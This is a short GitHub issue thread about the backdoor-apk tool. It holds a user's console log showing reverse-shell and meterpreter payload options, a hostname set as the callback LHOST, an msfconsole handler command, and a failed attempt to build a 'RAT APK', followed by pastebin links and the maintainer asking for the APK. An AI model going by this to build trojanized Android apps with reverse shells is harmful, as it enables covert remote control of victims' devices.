### ISSUE TITLE
can't set LHOST with hostname

### ISSUE THREAD

**Issue by Who1337** [dana-at-cp/backdoor-apk#116]
[*] Running backdoor-apk.sh v0.2.2 on Sat Jul 29 02:34:24 WIB 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 1
[?] Please enter an LHOST value: example.org
[?] Please enter an LPORT value: 1337
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[!] Failed to generate RAT APK file

 

_Sent from my Asus ASUS_T00F using [FastHub](https://play.google.com/store/apps/details?id=com.fastaccess.github)_

**Comment by Who1337** [comment]
https://pastebin.com/axZV8BBM

**Comment by Who1337** [comment]
https://pastebin.com/raw/axZV8BBM

**Comment by dana-at-cp** [comment]
@Who1337 Share the APK file you are working with please.
